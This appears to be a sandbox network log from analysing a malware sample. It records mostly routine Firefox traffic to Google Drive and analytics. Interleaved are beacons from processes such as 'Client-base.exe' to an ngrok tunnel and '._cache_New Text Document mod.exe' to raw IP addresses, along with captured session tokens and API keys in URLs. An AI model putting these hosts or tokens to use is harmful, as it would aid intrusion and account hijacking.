HTTP Request

GET https://workspace.google.com/assets/687e7157.min.js

HTTP Request

GET https://workspace.google.com/assets/1c6fe6ad.min.js

HTTP Request

GET https://workspace.google.com/assets/fb0914da.min.js

HTTP Request

GET https://workspace.google.com/assets/7ffa16ea.min.js

HTTP Request

GET https://workspace.google.com/assets/b59f5798.min.js
142.250.200.33:443

https://lh3.googleusercontent.com/7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-v0-rw

tls, http2

firefox.exe

82.6kB
4.2MB
1191
3039

HTTP Request

GET https://lh3.googleusercontent.com/SB__9Ik-UqlTHS9Mp0zO-QVdPPVxb3o1Ek17Z3y1Q7_rUGN0j8s-xA0rqdAXM0Mb1z3VJ8v-rDzHfDX-yLGfMxgbaKGAGHPmQZis=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/luR__x3sJf7BA833oja0gDViwRv_hnYZKBEcQOo9iBu3eKttHYmktkaCRjE4ECxmzFSQTIxMoCyhRY6WwXPJvw564LfY457Eig=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/qi-5khAOg8HlqE6BVJSyGuReX7cLrXx-tg_UlrLsP0sTvuIvMe2IdCenW9jL-KTjxkVf9f0ONBMOTBPE84bp-cl6PPEKhNgRzTQ=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/gXQ1CySD9oW9wM2niB5c0fnbttInuG7qtUzp7oQzry-ok6hg3lMuk6z0yKJTgUd2qBGs3xJwZF64iflmj8xP8SUwOvNbLPHGICjT=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/I-x3e5aXGAe8z9azwZi2W1Axx1xsibQBx8TRVHhbFhRucNWn-6PngJ1BoXci_06bcmvUaVc_HLTvPsv6NiqKJq4QyuYbYfm9bj9iZA=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/kb_Qu0wccTbbxMVmy7WnBOrPO8taACz0oi32xRNPuBBZe4uz50DwiYufFP7S3E230TGQSEu3Nu021PDcIADDimr7HrenNYCVv_EY=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/wePSigsq8uFv9S_k42piWs8mGFKr97FSAonu0EnxiiEim4g4n6KIGiu9o0OgbP8zq6GeJQW60MEDzWAWb5ahu9Sa0ZYUnh1fO8E=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/5xw2Y5jI0iz24qieD7U1ETqd1dwUZvtmZuJiGkKSQj-yEFaEVmLw6XgKXzOLon_RiX-5t3amygvXebgNN8bgyxQlO_3vhAgwpyMc=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/dvAfIQb0KajN6WUONfemiYUwCwrzoN7qAUsioJt2DyV1dt3LNLUmxHHvCXFHI6ZEFxjx_ClxenFxr587O36XX8a5QeUMEAS-1WJe

HTTP Request

GET https://lh3.googleusercontent.com/RzrCOW3W04EKFPlpQeagbcX-3FrUDfpa7qKhYBVJq0KQxjfBwoRBHGJpTWM2FAQgqioEmE5OxwLslpmuHpN-zD2mqY_AWKj95bsE

HTTP Request

GET https://lh3.googleusercontent.com/qSRx0MPsSqwsxnB7oa8jkMwSmA03iQcMjrmJOnmNkA4o_mA2a9Q1II6moeBU7r1ztzOXQpLnKuMhIeFPmiP46hOw728K4Aw3JY4=e365-pa-nu-rw-w1455

HTTP Request

GET https://lh3.googleusercontent.com/mFX4RtYSpBwXZXB71FNeXM6v9iEcAsCYoEWvaA0SJB_EfOi2TvXNJ455zRiaCZb-_IiTsbEDlOWQi1Y2as2t_9rzUQe6zkldGInt

HTTP Request

GET https://lh3.googleusercontent.com/5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-v0-rw

HTTP Request

GET https://lh3.googleusercontent.com/S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-v0-rw

HTTP Request

GET https://lh3.googleusercontent.com/7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-v0-rw
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
142.250.200.27:443

https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-7LhoZoRSU32Sn20yI8213k-92d83d07ba564bddac887d329c3589c2-Vector.svg

tls, http2

firefox.exe

2.5kB
19.4kB
21
25

HTTP Request

GET https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-3652TCzauH9jaL0QJ8H6FM-bfed64c7e8da9ac20d439f436570f955-Drive_Full_Logo_2x.svg

HTTP Request

GET https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-7LhoZoRSU32Sn20yI8213k-92d83d07ba564bddac887d329c3589c2-Vector.svg
142.250.200.27:443

storage.googleapis.com

tls, http2

firefox.exe

1.4kB
5.2kB
11
11
142.250.178.8:443

https://ssl.google-analytics.com/r/__utm.gif?utmwv=5.7.2&utms=1&utmn=212438136&utmhn=workspace.google.com&utme=8(Region*Language*Original%20URL*Country*14!uaRef)9(noram*en*workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F*us*14!val%3A)11(2*2*4!2)&utmcs=UTF-8&utmsr=1280x720&utmvp=1280x539&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&utmhid=1275141953&utmr=-&utmp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F%3Fchannel%3D%26e%3D&utmht=1736791490218&utmac=UA-18073-1&utmgtm=45He5190n51Q4J6v595350za200&utmcc=__utma%3D61317162.1516818363.1736791490.1736791490.1736791490.1%3B%2B__utmz%3D61317162.1736791490.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&aip=1&utmjid=2007399367&utmredir=1&utmmt=1&utmu=q_CgACBAAAGBAAAAAgAAAAAE~

tls, http2

firefox.exe

3.0kB
25.9kB
23
31

HTTP Request

GET https://ssl.google-analytics.com/ga.js

HTTP Request

GET https://ssl.google-analytics.com/r/__utm.gif?utmwv=5.7.2&utms=1&utmn=212438136&utmhn=workspace.google.com&utme=8(Region*Language*Original%20URL*Country*14!uaRef)9(noram*en*workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F*us*14!val%3A)11(2*2*4!2)&utmcs=UTF-8&utmsr=1280x720&utmvp=1280x539&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&utmhid=1275141953&utmr=-&utmp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F%3Fchannel%3D%26e%3D&utmht=1736791490218&utmac=UA-18073-1&utmgtm=45He5190n51Q4J6v595350za200&utmcc=__utma%3D61317162.1516818363.1736791490.1736791490.1736791490.1%3B%2B__utmz%3D61317162.1736791490.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&aip=1&utmjid=2007399367&utmredir=1&utmmt=1&utmu=q_CgACBAAAGBAAAAAgAAAAAE~
216.239.34.36:443

https://region1.analytics.google.com/g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736791489487&_gaz=1&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&ul=en&cid=1008019222.1736791490&sr=1280x720&_ng=1&ir=1&frm=0&pscdl=noapi&_eu=EA&_s=1&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736791490&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=page_view&_fv=1&_nsi=1&_ss=1&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=1280x672&ep.is_rivendell=true&tfd=1100

tls, http2

firefox.exe

2.9kB
6.6kB
16
15

HTTP Request

POST https://region1.analytics.google.com/g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736791489487&_gaz=1&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&ul=en&cid=1008019222.1736791490&sr=1280x720&_ng=1&ir=1&frm=0&pscdl=noapi&_eu=EA&_s=1&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736791490&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=page_view&_fv=1&_nsi=1&_ss=1&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=1280x672&ep.is_rivendell=true&tfd=1100
172.217.169.3:443

https://www.google.co.uk/ads/ga-audiences?v=1&t=sr&slf_rd=1&_r=4&_ng=1&tid=G-FWCBRW1RY8&cid=1008019222.1736791490&gtm=45je5190v886057375z8595350za200zb595350&aip=1&dma=0&gcd=13l3l3l3l1l1&npa=0&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178&tag_exp=101925629~102067555~102067808~102081485~102198178&z=986229174

tls, http2

firefox.exe

2.1kB
6.0kB
14
18

HTTP Request

GET https://www.google.co.uk/ads/ga-audiences?v=1&t=sr&slf_rd=1&_r=4&_ng=1&tid=G-FWCBRW1RY8&cid=1008019222.1736791490&gtm=45je5190v886057375z8595350za200zb595350&aip=1&dma=0&gcd=13l3l3l3l1l1&npa=0&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178&tag_exp=101925629~102067555~102067808~102081485~102198178&z=986229174
64.233.184.157:443

https://stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-18073-34&cid=1008019222.1736791490&jid=154731914&gjid=1025540979&_gid=1663413137.1736791490&_u=YCDAiEABDAAAAGgBI~&z=2028604563

tls, http2

firefox.exe

2.6kB
7.0kB
19
23

HTTP Request

POST https://stats.g.doubleclick.net/g/collect?v=2&_ng=1&tid=G-FWCBRW1RY8&cid=1008019222.1736791490&gtm=45je5190v886057375z8595350za200zb595350&aip=1&dma=0&gcd=13l3l3l3l1l1&npa=0&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178

HTTP Request

POST https://stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-18073-34&cid=1008019222.1736791490&jid=154731914&gjid=1025540979&_gid=1663413137.1736791490&_u=YCDAiEABDAAAAGgBI~&z=2028604563
142.250.200.33:443

lh3.googleusercontent.com

tls, http2

firefox.exe

1.5kB
10.4kB
11
14
142.250.178.14:443

https://apis.google.com/js/client.js

tls, http2

firefox.exe

2.2kB
12.3kB
17
22

HTTP Request

GET https://apis.google.com/js/client.js
142.250.200.42:443

https://feedback-pa.clients6.google.com/static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.5oZHy0SiJxw.O%2Fd%3D1%2Frs%3DAHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA%2Fm%3D__features__

tls, http2

firefox.exe

2.5kB
12.3kB
19
24

HTTP Request

GET https://feedback-pa.clients6.google.com/static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.5oZHy0SiJxw.O%2Fd%3D1%2Frs%3DAHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA%2Fm%3D__features__
216.58.204.66:443

https://ade.googlesyndication.com/ddm/activity/src=2507573;type=googl003;cat=fl-gw008;ord=1;num=1900757085904;npa=0;pscdl=denied;frm=0;gtm=45fe5190v9181638614z8595350za201zb595350;gcs=G101;gcd=13q3r3l3l5l1;dma=0;tag_exp=101925629~102067555~102067808~102081485~102123607~102198178;epver=2;~oref=https%3A%2F%2Fworkspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F?

tls, http2

firefox.exe

2.2kB
6.2kB
15
18

HTTP Request

GET https://ade.googlesyndication.com/ddm/activity/src=2507573;type=googl003;cat=fl-gw008;ord=1;num=1900757085904;npa=0;pscdl=denied;frm=0;gtm=45fe5190v9181638614z8595350za201zb595350;gcs=G101;gcd=13q3r3l3l5l1;dma=0;tag_exp=101925629~102067555~102067808~102081485~102123607~102198178;epver=2;~oref=https%3A%2F%2Fworkspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F?
142.250.178.14:443

accounts.youtube.com

tls, http2

firefox.exe

1.4kB
7.6kB
10
10
142.250.179.238:443

https://play.google.com/log?format=json&hasfast=true&authuser=0

tls, http2

firefox.exe

3.3kB
9.8kB
18
25

HTTP Request

POST https://play.google.com/log?format=json&hasfast=true&authuser=0

HTTP Request

POST https://play.google.com/log?format=json&hasfast=true&authuser=0
142.250.179.238:443

https://play.google.com/log?format=json&hasfast=true&authuser=0

tls, http2

firefox.exe

2.2kB
8.5kB
16
18

HTTP Request

OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0

HTTP Request

OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0
142.250.179.238:443

play.google.com

tls, http2

firefox.exe

1.4kB
7.6kB
10
10
142.250.179.238:443

play.google.com

tls, http2

firefox.exe

1.4kB
7.6kB
10
10
185.81.68.147:80

._cache_New Text Document mod.exe

260 B
5
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
147.185.221.25:11758

other-little.gl.at.ply.gg

DirectX111.exe

260 B
5
39.108.145.133:33892

._cache_Synaptics.exe

260 B
5
31.41.244.11:80

._cache_New Text Document mod.exe

260 B
5
45.93.20.67:80

._cache_New Text Document mod.exe

260 B
5
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
45.93.20.67:80

._cache_New Text Document mod.exe

260 B
5
142.250.178.14:443

https://accounts.youtube.com/accounts/SetSID?ssdc=1&sidt=ALWU2cvOE5%2BREkIkTeWl8pJjhWDKp2uaafLoo8cojqFbhekKdU44eU5NY%2BRIcEMF3kpvTLjKuYBmqsec6lnwaTwu2LMTewxQTEobUY4bx7Eii%2BSTEguxM1MScBGB4QdbWwNuqY6Y/7/n9AApz5Vb1KVoRL03f%2B5/RbNTOyGJ1EVJzGQxvQ8mUdnRHHkRcWr0AV6QBYPjl3NWBIKyJ2aSrXn%2BNaafoQQRp7XI0lVBATyWhts0CPjguAiMD60tu2MUxw58W1khETRhN/%2BXaMXbVLQhfpJmDtedggm8swA7s94Oiw6o1erBD34TlIak14JgOwTO%2BZ1Tu2Y11wsYL/d2S%2Bqw4K1dmzlGmz6qaONx69xMCooTIygLBy7YrzVGI6UCmRWJxrGnq46Y2aueAPPBrRjuRTePHsPc0BZAY8wxRHYdmRknhAWRhNI5I2wefH2HRstCP7I9F35JVZfUhYwUVL608s1%2Bg/EeDgPBZb/XEsYIGTqwb75pFYvitTuZN0W3TlN1IO07DMSxqNGi8sLBN2%2Bnr77L7bL4F6zE5pe1Q1qtOtxv7niVLCQ/IOt2OihCnE9dDLpkzO%2B0snMovZit0GsTk5SXB%2BU5yvF6d/c717y%2BoSQOOftUYZBVV2zpA%2BadsLnevrEk/6gC9wPjljo0llumEMyFz8f%2BPzOnEQPfAH9ZgXlu9vDayOVCycK7/7sE0UBAQ75w5sYmEKBt6YB9Aj7wSRPVMlWNoFIxEOciWK2Ict1t7Ox9HfIBJ6jbEOYlMElwqSHYslFZ&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto%26authuser%3D0&tcc=1&dbus=GB&ifkv=AVdkyDlNCKA4_v2sX8NpOmwOsKr_1xAJAn291PGqfFYhszukOXq-xndE-vF09hJtLm41wNF5zKV1

tls, http2

firefox.exe

2.9kB
11.8kB
16
19

HTTP Request

GET https://accounts.youtube.com/accounts/SetSID?ssdc=1&sidt=ALWU2cvOE5%2BREkIkTeWl8pJjhWDKp2uaafLoo8cojqFbhekKdU44eU5NY%2BRIcEMF3kpvTLjKuYBmqsec6lnwaTwu2LMTewxQTEobUY4bx7Eii%2BSTEguxM1MScBGB4QdbWwNuqY6Y/7/n9AApz5Vb1KVoRL03f%2B5/RbNTOyGJ1EVJzGQxvQ8mUdnRHHkRcWr0AV6QBYPjl3NWBIKyJ2aSrXn%2BNaafoQQRp7XI0lVBATyWhts0CPjguAiMD60tu2MUxw58W1khETRhN/%2BXaMXbVLQhfpJmDtedggm8swA7s94Oiw6o1erBD34TlIak14JgOwTO%2BZ1Tu2Y11wsYL/d2S%2Bqw4K1dmzlGmz6qaONx69xMCooTIygLBy7YrzVGI6UCmRWJxrGnq46Y2aueAPPBrRjuRTePHsPc0BZAY8wxRHYdmRknhAWRhNI5I2wefH2HRstCP7I9F35JVZfUhYwUVL608s1%2Bg/EeDgPBZb/XEsYIGTqwb75pFYvitTuZN0W3TlN1IO07DMSxqNGi8sLBN2%2Bnr77L7bL4F6zE5pe1Q1qtOtxv7niVLCQ/IOt2OihCnE9dDLpkzO%2B0snMovZit0GsTk5SXB%2BU5yvF6d/c717y%2BoSQOOftUYZBVV2zpA%2BadsLnevrEk/6gC9wPjljo0llumEMyFz8f%2BPzOnEQPfAH9ZgXlu9vDayOVCycK7/7sE0UBAQ75w5sYmEKBt6YB9Aj7wSRPVMlWNoFIxEOciWK2Ict1t7Ox9HfIBJ6jbEOYlMElwqSHYslFZ&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto%26authuser%3D0&tcc=1&dbus=GB&ifkv=AVdkyDlNCKA4_v2sX8NpOmwOsKr_1xAJAn291PGqfFYhszukOXq-xndE-vF09hJtLm41wNF5zKV1
66.102.1.94:443

https://accounts.google.co.uk/accounts/SetSID?ssdc=1&sidt=ALWU2cvQ7nejkyvoeXft7FL1DAEddSkZHo%2BT6iwYH8Cl//i3LsPH%2Bf8YjDJbxbjjT88xQDu3Bx2h%2BDRYDoN15dvtZvODIUm0b9Po7Bj1BWCtYqlgJe1PTn0mwcxnAo8KWDawQgwgBgi%2BLkFSYuFRSrUB0umcoUiBjZorM2B/1kl023LQv%2BNCm85SU%2BBBxjtyPdyPn75Q/IEPyWY46e7qKX7UngKCa0cU8pqdXotzIVk15aiD6%2BnckFyoBCP%2BtEpPIG35qewm5vSFhQAA%2BxUg1M8RKc4FYbXQgyZM5ih%2B4lP2oJ/nY6fcl2XBpWTtqgVVBJ8HJYI4OSCfTHMiOYEyybBBHNKVdYq9NuoCTMJWFw%2B64P4y9F6P8wvDW8ke/ES6ZbJwgHF1ilQXOf6hEmURQdxDWNYB0O9XVCxc17gPgj7ZYEpRkyQSS6IfcT%2B8Jx2w6Y6YrfUFLZjA30vkXc2/6vjwGyOwuRywp0q0uJlKYZI3YBE6LuIR4K6M9ew8qbV90pjG7fYF%2BkFzkBmgOWO2HNYGItEYncwBNGJXujKs1XPxxcRQxYNDS8eA78g8EJAbkZXi8GgzihRo3wG%2BTWeoBBXQEPx82C4JglFttd3XCllE304%2BnXuLIKP8emzLPTkGOBeAHGx5CuFojjRARUQ6ZuuoKXX0M35SOzINDc5ABA0uGZd%2BOF86CviJFRTArbpsv/DeujYqcW5ipB/1vhNpzEGE1b5V0O6bsYIRq1vB1Z2E4eHo%2BwKKsPGhCdq2Rx4tCkhycVTvsEfc&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto%26authuser%3D0&tcc=1&ifkv=AVdkyDnomaTisEG-QepVkzsfWxUEAv16Oq5jPQdWGSuqN51A5KLQH7dWy0eUaxzRyKaKfFX8ocWF

tls, http2

firefox.exe

2.9kB
8.4kB
15
17

HTTP Request

GET https://accounts.google.co.uk/accounts/SetSID?ssdc=1&sidt=ALWU2cvQ7nejkyvoeXft7FL1DAEddSkZHo%2BT6iwYH8Cl//i3LsPH%2Bf8YjDJbxbjjT88xQDu3Bx2h%2BDRYDoN15dvtZvODIUm0b9Po7Bj1BWCtYqlgJe1PTn0mwcxnAo8KWDawQgwgBgi%2BLkFSYuFRSrUB0umcoUiBjZorM2B/1kl023LQv%2BNCm85SU%2BBBxjtyPdyPn75Q/IEPyWY46e7qKX7UngKCa0cU8pqdXotzIVk15aiD6%2BnckFyoBCP%2BtEpPIG35qewm5vSFhQAA%2BxUg1M8RKc4FYbXQgyZM5ih%2B4lP2oJ/nY6fcl2XBpWTtqgVVBJ8HJYI4OSCfTHMiOYEyybBBHNKVdYq9NuoCTMJWFw%2B64P4y9F6P8wvDW8ke/ES6ZbJwgHF1ilQXOf6hEmURQdxDWNYB0O9XVCxc17gPgj7ZYEpRkyQSS6IfcT%2B8Jx2w6Y6YrfUFLZjA30vkXc2/6vjwGyOwuRywp0q0uJlKYZI3YBE6LuIR4K6M9ew8qbV90pjG7fYF%2BkFzkBmgOWO2HNYGItEYncwBNGJXujKs1XPxxcRQxYNDS8eA78g8EJAbkZXi8GgzihRo3wG%2BTWeoBBXQEPx82C4JglFttd3XCllE304%2BnXuLIKP8emzLPTkGOBeAHGx5CuFojjRARUQ6ZuuoKXX0M35SOzINDc5ABA0uGZd%2BOF86CviJFRTArbpsv/DeujYqcW5ipB/1vhNpzEGE1b5V0O6bsYIRq1vB1Z2E4eHo%2BwKKsPGhCdq2Rx4tCkhycVTvsEfc&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto%26authuser%3D0&tcc=1&ifkv=AVdkyDnomaTisEG-QepVkzsfWxUEAv16Oq5jPQdWGSuqN51A5KLQH7dWy0eUaxzRyKaKfFX8ocWF
185.215.113.16:80

._cache_New Text Document mod.exe

260 B
5
142.250.200.3:443

https://ssl.gstatic.com/images/branding/product/1x/drive_2020q4_48dp.png

tls, http2

firefox.exe

2.0kB
7.1kB
15
15

HTTP Request

GET https://ssl.gstatic.com/images/branding/product/1x/drive_2020q4_48dp.png
216.58.212.238:443

https://lh3.google.com/u/0/ogw/AF2bZyj0W6ZVtN8KyX5zrkx3xUynQy35o_-yt2-kzNE_9KURxA=s32-c-mo

tls, http2

firefox.exe

3.6kB
11.3kB
17
22

HTTP Request

GET https://lh3.google.com/u/0/ogw/AF2bZyj0W6ZVtN8KyX5zrkx3xUynQy35o_-yt2-kzNE_9KURxA=s32-c-mo
142.250.200.33:443

drive-thirdparty.googleusercontent.com

tls, http2

firefox.exe

1.4kB
10.3kB
9
11
142.250.200.33:443

drive-thirdparty.googleusercontent.com

tls, http2

firefox.exe

1.4kB
10.3kB
11
12
142.250.200.33:443

drive-thirdparty.googleusercontent.com

tls, http2

firefox.exe

1.4kB
10.3kB
10
12
142.250.200.33:443

drive-thirdparty.googleusercontent.com

tls, http2

firefox.exe

1.4kB
10.4kB
11
14
142.250.187.238:443

https://clients6.google.com/drive/v2internal/apps?openDrive=true&reason=301&syncType=0&errorRecovery=false&fields=kind%2CdefaultAppIds%2Citems(kind%2Cid%2CuseByDefault%2Cname%2CopenUrlTemplate%2CprimaryMimeTypes%2CsecondaryMimeTypes%2CcreateUrl%2CcreateInFolderTemplate%2CobjectType%2CsupportsCreate%2CsupportsImport%2CsupportsMultiOpen%2CsupportsOfflineCreate%2Cinstalled%2Cauthorized%2CproductUrl%2CprimaryFileExtensions%2CsecondaryFileExtensions%2CshortDescription%2ClongDescription%2CproductId%2Cremovable%2Cicons(iconUrl%2Csize%2Ccategory)%2Ctype%2CchromeExtensionIds%2CrequiresAuthorizationBeforeOpenWith%2ChasDriveWideScope%2CdriveBranded%2CdriveSource%2CsupportsMobileBrowser%2CsupportsTeamDrives%2ChasGsmListing)&languageCode=en&retryCount=0&dsNonce=efxltteqc1lr&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

tls, http2

firefox.exe

4.4kB
20.7kB
17
25

HTTP Request

GET https://clients6.google.com/drive/v2internal/apps?openDrive=true&reason=301&syncType=0&errorRecovery=false&fields=kind%2CdefaultAppIds%2Citems(kind%2Cid%2CuseByDefault%2Cname%2CopenUrlTemplate%2CprimaryMimeTypes%2CsecondaryMimeTypes%2CcreateUrl%2CcreateInFolderTemplate%2CobjectType%2CsupportsCreate%2CsupportsImport%2CsupportsMultiOpen%2CsupportsOfflineCreate%2Cinstalled%2Cauthorized%2CproductUrl%2CprimaryFileExtensions%2CsecondaryFileExtensions%2CshortDescription%2ClongDescription%2CproductId%2Cremovable%2Cicons(iconUrl%2Csize%2Ccategory)%2Ctype%2CchromeExtensionIds%2CrequiresAuthorizationBeforeOpenWith%2ChasDriveWideScope%2CdriveBranded%2CdriveSource%2CsupportsMobileBrowser%2CsupportsTeamDrives%2ChasGsmListing)&languageCode=en&retryCount=0&dsNonce=efxltteqc1lr&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8
142.250.187.238:443

https://clients6.google.com/drive/v2beta/apps?openDrive=true&reason=700&syncType=0&errorRecovery=false&fields=items(icons%5Bcategory%3D%27application%27%5D%2Cicons(size%2CiconUrl)%2Cid%2Cname%2CopenUrlTemplate%2CprimaryFileExtensions%2CprimaryMimeTypes%2CproductId%2CrankingInfo%2CsecondaryFileExtensions%2CsecondaryMimeTypes%2Ckind)%2Ckind&appQueryScope=all_webstore&languageCode=en&retryCount=0&key=AIzaSyBc1bLOZpOtg3-qgMjSQ6pmn6HbE2zjzJg

tls, http2

firefox.exe

3.0kB
8.7kB
15
20

HTTP Request

OPTIONS https://clients6.google.com/drive/v2internal/apps?openDrive=true&reason=301&syncType=0&errorRecovery=false&fields=kind%2CdefaultAppIds%2Citems(kind%2Cid%2CuseByDefault%2Cname%2CopenUrlTemplate%2CprimaryMimeTypes%2CsecondaryMimeTypes%2CcreateUrl%2CcreateInFolderTemplate%2CobjectType%2CsupportsCreate%2CsupportsImport%2CsupportsMultiOpen%2CsupportsOfflineCreate%2Cinstalled%2Cauthorized%2CproductUrl%2CprimaryFileExtensions%2CsecondaryFileExtensions%2CshortDescription%2ClongDescription%2CproductId%2Cremovable%2Cicons(iconUrl%2Csize%2Ccategory)%2Ctype%2CchromeExtensionIds%2CrequiresAuthorizationBeforeOpenWith%2ChasDriveWideScope%2CdriveBranded%2CdriveSource%2CsupportsMobileBrowser%2CsupportsTeamDrives%2ChasGsmListing)&languageCode=en&retryCount=0&dsNonce=efxltteqc1lr&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

HTTP Request

OPTIONS https://clients6.google.com/drive/v2beta/apps?openDrive=true&reason=700&syncType=0&errorRecovery=false&fields=items(icons%5Bcategory%3D%27application%27%5D%2Cicons(size%2CiconUrl)%2Cid%2Cname%2CopenUrlTemplate%2CprimaryFileExtensions%2CprimaryMimeTypes%2CproductId%2CrankingInfo%2CsecondaryFileExtensions%2CsecondaryMimeTypes%2Ckind)%2Ckind&appQueryScope=all_webstore&languageCode=en&retryCount=0&key=AIzaSyBc1bLOZpOtg3-qgMjSQ6pmn6HbE2zjzJg
142.250.178.10:443

https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Create

tls, http2

firefox.exe

4.2kB
36.0kB
22
36

HTTP Request

POST https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Create
142.250.178.10:443

https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Ping

tls, http2

firefox.exe

2.4kB
11.9kB
18
25

HTTP Request

OPTIONS https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Create

HTTP Request

